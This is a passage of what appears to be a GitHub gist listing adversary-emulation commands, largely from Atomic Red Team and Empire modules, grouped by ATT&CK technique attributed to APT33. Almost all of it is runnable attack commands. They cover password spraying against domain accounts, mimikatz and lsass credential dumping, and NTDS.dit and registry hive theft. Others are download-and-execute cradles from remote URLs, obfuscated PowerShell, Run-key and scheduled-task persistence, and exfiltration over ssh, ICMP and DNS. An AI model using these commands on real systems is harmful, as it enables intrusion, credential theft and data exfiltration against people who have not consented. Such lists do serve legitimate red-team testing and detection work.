    for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-beacon.ps1 -Domain example.com -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-beacon.ps1 -Domain example.com -Subdomain atomicredteam -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-domain-length.ps1 -Domain example.com -Subdomain #{subdomain} -QueryType TXT
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType #{query_type}
    ```

    # Actor: APT33
    ## Technique Name: Uncommonly Used Port
    ## Technique Commands

    ```
    test-netconnection -ComputerName google.com -port #{port}
    test-netconnection -ComputerName google.com -port 8081
    telnet google.com #{port}
    telnet google.com 8081
    ```
    10,798 changes: 10,798 additions & 0 deletions iranian_apit_groups_possible_commands.md
    View file
    10,798 additions, 0 deletions not shown because the diff is too large. Please use a local Git client to view these changes.
  3. MSAdministrator created this gist Jan 3, 2020.
    628 changes: 628 additions & 0 deletions apt33_apt34_possible_commands.md
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,628 @@
    # Actor: APT33
    ## Technique Name: Brute Force
    ## Technique Commands

    ```
    net user /domain > DomainUsers.txt
    echo "Password1" >> #{input_file_passwords}
    echo "1q2w3e4r" >> #{input_file_passwords}
    echo "Password!" >> #{input_file_passwords}
    @FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
    net user /domain > DomainUsers.txt
    echo "Password1" >> #{input_file_passwords}
    echo "1q2w3e4r" >> #{input_file_passwords}
    echo "Password!" >> #{input_file_passwords}
    @FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:YOUR_COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
    net user /domain > #{input_file_users}
    echo "Password1" >> #{input_file_passwords}
    echo "1q2w3e4r" >> #{input_file_passwords}
    echo "Password!" >> #{input_file_passwords}
    @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use \\COMPANYDC1\IPC$ /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
    net user /domain > #{input_file_users}
    echo "Password1" >> passwords.txt
    echo "1q2w3e4r" >> passwords.txt
    echo "Password!" >> passwords.txt
    @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
    powershell/recon/get_sql_server_login_default_pw
    powershell/recon/get_sql_server_login_default_pw
    powershell/recon/http_login
    powershell/recon/http_login
    powershell/situational_awareness/network/smbautobrute
    powershell/situational_awareness/network/smbautobrute
    powershell/situational_awareness/network/smbscanner
    powershell/situational_awareness/network/smbscanner
    Shell
    root @ icbc: / hacker / mima # hydra -l root -P passwd.txt ssh: //192.168.159.132 -V
    Hydra v9.0 (c) 2019 by van Hauser / THC - Please do not use in military or secret service organizations, or for illegal purposes.
    auth.log
    Log
    Failed password for root from 192.168.159.129 port 43728 ssh2
    audit.log
    Log
    type = USER_AUTH msg = audit (1572163129.581: 316): pid = 2165 uid = 0 auid = 4294967295 ses = 4294967295 msg = 'op = PAM: authentication acct = "root" exe = "/ usr / sbin / sshd" hostname = 192.168 .159.129 addr = 192.168.159.129 terminal = ssh res = failed '
    ```

    # Actor: APT33
    ## Technique Name: Commonly Used Port
    ## Technique Commands

    ```
    !=powershell.exe
    nslookup
    !=cmd.exe
    nslookup
    powershell/lateral_movement/invoke_sshcommand
    powershell/lateral_movement/invoke_sshcommand
    ```

    # Actor: APT33
    ## Technique Name: Credential Dumping
    ## Technique Commands

    ```
    hashdump
    mimikatz !lsadump::sam
    hashdump
    run hashdump
    run smart_hashdump
    post/windows/gather/credentials/domain_hashdump
    logonpasswords
    mimikatz !sekurlsa::logonpasswords
    mimikatz !sekurlsa::msv
    mimikatz !sekurlsa::kerberos
    mimikatz !sekurlsa::wdigest
    use mimikatz
    wdigest
    msv
    kerberos
    logonpasswords
    IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
    gsecdump -a
    wce -o output.txt
    reg save HKLM\sam sam
    reg save HKLM\system system
    reg save HKLM\security security
    procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp
    ntdsutil "ac i ntds" "ifm" "create full C:\Atomic_Red_Team" q q
    vssadmin.exe create shadow /for=C:
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
    reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE
    reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE
    findstr /S cpassword %logonserver%\sysvol\*.xml
    . $PathToAtomicsFolder\T1003\src\Get-GPPPassword.ps1
    Get-GPPPassword -Verbose
    ntdsutil.exe
    \\Windows\\.+\\lsass.exeHKLM\SAM|HKLM\Security
    \\Windows\\.+\\bcryptprimitives.dll|\\Windows\\.+\\bcrypt.dll|\\Windows\\.+\\ncrypt.dll
    powershell/collection/ChromeDump
    powershell/collection/ChromeDump
    powershell/collection/FoxDump
    powershell/collection/FoxDump
    powershell/collection/ninjacopy
    powershell/collection/ninjacopy
    powershell/collection/vaults/add_keepass_config_trigger
    powershell/collection/vaults/add_keepass_config_trigger
    powershell/collection/vaults/find_keepass_config
    powershell/collection/vaults/find_keepass_config
    powershell/collection/vaults/get_keepass_config_trigger
    powershell/collection/vaults/get_keepass_config_trigger
    powershell/collection/vaults/keethief
    powershell/collection/vaults/keethief
    powershell/collection/vaults/remove_keepass_config_trigger
    powershell/collection/vaults/remove_keepass_config_trigger
    powershell/credentials/enum_cred_store
    powershell/credentials/enum_cred_store
    powershell/credentials/mimikatz/cache
    powershell/credentials/mimikatz/cache
    powershell/credentials/mimikatz/command
    powershell/credentials/mimikatz/command
    powershell/credentials/mimikatz/dcsync
    powershell/credentials/mimikatz/dcsync
    powershell/credentials/mimikatz/dcsync_hashdump
    powershell/credentials/mimikatz/dcsync_hashdump
    powershell/credentials/mimikatz/extract_tickets
    powershell/credentials/mimikatz/extract_tickets
    powershell/credentials/mimikatz/golden_ticket
    powershell/credentials/mimikatz/golden_ticket
    powershell/credentials/mimikatz/logonpasswords
    powershell/credentials/mimikatz/logonpasswords
    powershell/credentials/mimikatz/lsadump
    powershell/credentials/mimikatz/lsadump
    powershell/credentials/mimikatz/mimitokens
    powershell/credentials/mimikatz/mimitokens
    powershell/credentials/mimikatz/sam
    powershell/credentials/mimikatz/sam
    powershell/credentials/mimikatz/silver_ticket
    powershell/credentials/mimikatz/silver_ticket
    powershell/credentials/mimikatz/trust_keys
    powershell/credentials/mimikatz/trust_keys
    powershell/credentials/powerdump
    powershell/credentials/powerdump
    powershell/credentials/vault_credential
    powershell/credentials/vault_credential
    powershell/management/downgrade_account
    powershell/management/downgrade_account
    powershell/management/wdigest_downgrade
    powershell/management/wdigest_downgrade
    powershell/privesc/gpp
    powershell/privesc/gpp
    powershell/privesc/mcafee_sitelist
    powershell/privesc/mcafee_sitelist
    python/collection/linux/hashdump
    python/collection/linux/hashdump
    python/collection/linux/mimipenguin
    python/collection/linux/mimipenguin
    python/collection/osx/hashdump
    python/collection/osx/hashdump
    python/collection/osx/kerberosdump
    python/collection/osx/kerberosdump
    python/management/multi/kerberos_inject
    python/management/multi/kerberos_inject
    python/situational_awareness/network/dcos/etcd_crawler
    python/situational_awareness/network/dcos/etcd_crawler
    ```

    # Actor: APT33
    ## Technique Name: Data Compressed
    ## Technique Commands

    ```
    dir #{input_file} -Recurse | Compress-Archive -DestinationPath $env:USERPROFILE\data.zip
    dir $env:USERPROFILE -Recurse | Compress-Archive -DestinationPath $env:USERPROFILE\data.zip
    rar a -r #{output_file} #{input_path} *.txt
    rar a -r %USERPROFILE%\data.rar #{input_path} *.txt
    rar a -r #{output_file} %USERPROFILE% *#{file_extension}
    zip $HOME/data.zip #{input_files}
    zip $HOME/data.zip $HOME/*.txt
    test -e $HOME/victim-gzip.txt && gzip -k $HOME/victim-gzip.txt || (echo '#{input_content}' >> $HOME/victim-gzip.txt; gzip -k $HOME/victim-gzip.txt)
    test -e $HOME/victim-gzip.txt && gzip -k $HOME/victim-gzip.txt || (echo 'confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101' >> $HOME/victim-gzip.txt; gzip -k $HOME/victim-gzip.txt)
    tar -cvzf $HOME/data.tar.gz #{input_file_folder}
    tar -cvzf $HOME/data.tar.gz $HOME/$USERNAME
    rar.exe
    powershell/management/zipfolder
    powershell/management/zipfolder
    ```

    # Actor: APT33
    ## Technique Name: Data Encoding
    ## Technique Commands

    ```
    echo -n 111-11-1111 | base64
    curl -XPOST MTExLTExLTExMTE=.#{destination_url}
    echo -n 111-11-1111 | base64
    curl -XPOST MTExLTExLTExMTE=.redcanary.com
    ```

    # Actor: APT33
    ## Technique Name: Exfiltration Over Alternative Protocol
    ## Technique Commands

    ```
    ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
    ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
    ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
    tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@target.example.com 'cat > /Users.tar.gz.enc'
    tar czpf - /Users/* | openssl des3 -salt -pass atomic | ssh #{user_name}@target.example.com 'cat > /Users.tar.gz.enc'
    tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh atomic@#{domain} 'cat > /Users.tar.gz.enc'
    $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("127.0.0.1", 1500, $Data) }
    $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path C:\Windows\System32\notepad.exe -Encoding Byte -ReadCount 1024) { $ping.Send("127.0.0.1", 1500, $Data) }
    powershell/exfiltration/exfil_dropbox
    powershell/exfiltration/exfil_dropbox
    exfiltration/Invoke_ExfilDataToGitHub
    exfiltration/Invoke_ExfilDataToGitHub
    ```

    # Actor: APT33
    ## Technique Name: Exploitation for Privilege Escalation
    ## Technique Commands

    ```
    getsystem
    getsystem
    bitsadmin.exe
    msbuild.exe *MSBuildShell.csproj
    powershell/privesc/ms16-032
    powershell/privesc/ms16-032
    powershell/privesc/tater
    powershell/privesc/tater
    powershell/privesc/ms16-135
    powershell/privesc/ms16-135
    ```

    # Actor: APT33
    ## Technique Name: Network Sniffing
    ## Technique Commands

    ```
    tcpdump -c 5 -nnni ens33
    tshark -c 5 -i ens33
    tcpdump -c 5 -nnni en0A
    tshark -c 5 -i en0A
    "c:\Program Files\Wireshark\tshark.exe" -i Ethernet0 -c 5
    c:\windump.exe
    & "c:\Program Files\Wireshark\tshark.exe" -i Ethernet0 -c 5
    & c:\windump.exe
    powershell/collection/packet_capture
    powershell/collection/packet_capture
    python/collection/linux/sniffer
    python/collection/linux/sniffer
    python/collection/osx/sniffer
    python/collection/osx/sniffer
    ```

    # Actor: APT33
    ## Technique Name: Obfuscated Files or Information
    ## Technique Commands

    ```
    sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
    cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
    chmod +x /tmp/art.sh
    /tmp/art.sh
    $OriginalCommand = 'Write-Host "Hey, Atomic!"'
    $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
    $EncodedCommand =[Convert]::ToBase64String($Bytes)
    $EncodedCommand
    powershell.exe -EncodedCommand $EncodedCommand
    $OriginalCommand = '#{powershell_command}'
    $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
    $EncodedCommand =[Convert]::ToBase64String($Bytes)
    $EncodedCommand
    Set-ItemProperty -Force -Path #{registry_key_storage} -Name Debug -Value $EncodedCommand
    powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} Debug).Debug)))"
    $OriginalCommand = 'Write-Host "Hey, Atomic!"'
    $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
    $EncodedCommand =[Convert]::ToBase64String($Bytes)
    $EncodedCommand
    Set-ItemProperty -Force -Path #{registry_key_storage} -Name Debug -Value $EncodedCommand
    powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} Debug).Debug)))"
    $OriginalCommand = '#{powershell_command}'
    $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
    $EncodedCommand =[Convert]::ToBase64String($Bytes)
    $EncodedCommand
    Set-ItemProperty -Force -Path HKCU:Software\Microsoft\Windows\CurrentVersion -Name #{registry_entry_storage} -Value $EncodedCommand
    powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\Microsoft\Windows\CurrentVersion #{registry_entry_storage}).#{registry_entry_storage})))"
    [a-z0-9]{1}.exe
    *.exe \*.exe\:Zone.Identifier:$DATA"
    ```

    # Actor: APT33
    ## Technique Name: PowerShell
    ## Technique Commands

    ```
    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1'); Invoke-BloodHound"
    (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
    (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
    Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
    $url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
    Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
    New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password ATOM1CR3DT3@M -Description '#{description}'
    New-LocalUser -FullName '#{full_name}' -Name 'atomic_user' -Password ATOM1CR3DT3@M -Description '#{description}'
    New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description 'Atomic Things'
    New-LocalUser -FullName 'Atomic Red Team' -Name '#{user_name}' -Password #{password} -Description 'Atomic Things'
    powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
    powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml');$Xml.command.a.execute | IEX"
    "C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct').Exec();close()"
    # Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
    reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
    iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
    powershell.exe -version 2 -Command Write-Host $PSVersion
    Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
    $streamcommand = Get-Content -Path $env:TEMP\NTFS_ADS.txt -Stream 'streamcommand'
    Invoke-Expression $streamcommand
    excel.exe
    cmd.exe
    powershell.exe
    excel.exe
    powershell.exe
    mshta.exe
    cmd.exe
    powershell.exe
    mshta.exe
    powershell.exe
    powerpoint.exe
    cmd.exe
    powershell.exe
    powerpoint.exe
    powershell.exe
    powershell.exe webClient.DownloadString(
    powershell.exe webClient.DownloadFile
    powershell.exe webClient.DownloadData
    winword.exe
    powershell.exe
    hidden|-enc|-NonI\\Windows\\.+\\WindowsPowerShell\\.+\\powershell.exe
    powershell/lateral_movement/invoke_psremoting
    powershell/lateral_movement/invoke_psremoting
    powershell/management/spawn
    powershell/management/spawn
    python/management/multi/spawn
    python/management/multi/spawn
    ```

    # Actor: APT33
    ## Technique Name: Registry Run Keys / Startup Folder
    ## Technique Commands

    ```
    REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "C:\Path\AtomicRedTeam.exe"
    REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\Path\AtomicRedTeam.dll"
    $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
    set-itemproperty $RunOnceKey "NextRun" 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
    Software\Microsoft\Windows\CurrentVersion\Run|Software\Microsoft\Windows\CurrentVersion\RunOnce|Software\Microsoft\Windows\CurrentVersion\RunOnceEx|Software\Microsoft\Windows\CurrentVersion\RunServicesOnce|Software\Microsoft\Windows\CurrentVersion\RunServices|SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad|Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run|Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders|Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
    \Microsoft\Windows\Start Menu\Programs\Startup|Software\Microsoft\Windows\CurrentVersion\Run|Software\Microsoft\Windows\CurrentVersion\RunOnce|Software\Microsoft\Windows\CurrentVersion\RunOnceEx|Software\Microsoft\Windows\CurrentVersion\RunServicesOnce|Software\Microsoft\Windows\CurrentVersion\RunServices|SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad|Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run|Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders|Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Microsoft\Windows\Start Menu\Programs\Startup
    \Microsoft\Windows\Start Menu\Programs\Startup\Microsoft\Windows\Start Menu\Programs\Startup
    powershell/persistence/elevated/registry
    powershell/persistence/elevated/registry
    powershell/persistence/userland/registry
    powershell/persistence/userland/registry
    ```

    # Actor: APT33
    ## Technique Name: Remote File Copy
    ## Technique Commands

    ```
    rsync -r #{local_path} victim@#{remote_host}:#{remote_path}
    rsync -r /tmp/adversary-rsync/ victim@#{remote_host}:#{remote_path}
    rsync -r #{local_path} #{username}@victim-host:#{remote_path}
    rsync -r #{local_path} #{username}@victim-host:/tmp/victim-files
    rsync -r adversary@#{remote_host}:#{remote_path} #{local_path}
    rsync -r adversary@#{remote_host}:#{remote_path} /tmp/victim-files
    rsync -r #{username}@adversary-host:#{remote_path} #{local_path}
    rsync -r #{username}@adversary-host:/tmp/adversary-rsync/ #{local_path}
    scp #{local_file} victim@#{remote_host}:#{remote_path}
    scp /tmp/adversary-scp victim@#{remote_host}:#{remote_path}
    scp #{local_file} #{username}@victim-host:#{remote_path}
    scp #{local_file} #{username}@victim-host:/tmp/victim-files/
    scp adversary@#{remote_host}:#{remote_file} #{local_path}
    scp adversary@#{remote_host}:/tmp/adversary-scp #{local_path}
    scp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/
    scp #{username}@adversary-host:#{remote_file} /tmp/victim-files/
    sftp victim@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
    sftp victim@#{remote_host}:#{remote_path} <<< $'put /tmp/adversary-sftp'
    sftp #{username}@victim-host:#{remote_path} <<< $'put #{local_file}'
    sftp #{username}@victim-host:/tmp/victim-files/ <<< $'put #{local_file}'
    sftp adversary@#{remote_host}:#{remote_file} #{local_path}
    sftp adversary@#{remote_host}:/tmp/adversary-sftp #{local_path}
    sftp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/
    sftp #{username}@adversary-host:#{remote_file} /tmp/victim-files/
    cmd /c certutil -urlcache -split -f #{remote_file} Atomic-license.txt
    cmd /c certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt
    $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
    New-Item -Path $datePath -ItemType Directory
    Set-Location $datePath
    certutil -verifyctl -split -f #{remote_file}
    Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }
    $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
    New-Item -Path $datePath -ItemType Directory
    Set-Location $datePath
    certutil -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
    Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }
    C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH #{remote_file} #{local_path}
    C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH #{remote_file} Atomic-license.txt
    C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt #{local_path}
    (New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "Atomic-license.txt")
    (New-Object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt", "Atomic-license.txt")
    ```

    # Actor: APT33
    ## Technique Name: Scheduled Task
    ## Technique Commands

    ```
    schtasks [/s HOSTNAME]
    shell schtasks
    Creating a scheduled task:
    schtasks [/S HOSTNAME] /create /tn "acachesrv" /tr C:\file\path\here.exe /sc ONLOGON /ru "System" [/rp password]
    Requirements for running scheduled tasks:
    net start schedule
    sc config schedule start= auto
    Creating a scheduled task:
    shell schtasks [/S HOSTNAME] /create /tn "acachesrv" /tr C:\file\path\here.exe /sc ONLOGON /ru "System" [/rp password]
    Requirements for running scheduled tasks:
    shell net start schedule
    shell sc config schedule start= auto
    at 13:20 /interactive cmd
    SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST #{time}
    SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST #{time}
    SCHTASKS /Create /S #{target} /RU #{user_name} /RP At0micStrong /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST #{time}
    SCHTASKS /Create /S #{target} /RU DOMAIN\user /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
    SCHTASKS /Create /S localhost /RU DOMAIN\user /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
    $Action = New-ScheduledTaskAction -Execute "calc.exe"
    $Trigger = New-ScheduledTaskTrigger -AtLogon
    $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
    $Set = New-ScheduledTaskSettingsSet
    $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
    Register-ScheduledTask AtomicTask -InputObject $object
    schtask.exe /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
    schtask.exe /create /tn "mysc" /tr C:\windows\system32\cmd.exe /sc ONLOGON /ru "System"
    at.exe ##:## /interactive cmd
    at.exe \\[computername|IP] ##:## c:\temp\evil.bat
    net.exe use \\[computername|IP] /user:DOMAIN\username password
    net.exe time \\[computername|IP]
    schtasks.exe /create * appdata
    \\Windows\\.+\\at.exe
    /Create\\Windows\\.+\\schtasks.exe
    powershell/lateral_movement/new_gpo_immediate_task
    powershell/lateral_movement/new_gpo_immediate_task
    powershell/persistence/elevated/schtasks
    powershell/persistence/elevated/schtasks
    powershell/persistence/userland/schtasks
    powershell/persistence/userland/schtasks
    ```

    # Actor: APT33
    ## Technique Name: Standard Application Layer Protocol
    ## Technique Commands

    ```
    Invoke-WebRequest www.google.com -UserAgent "HttpBrowser/1.0" | out-null
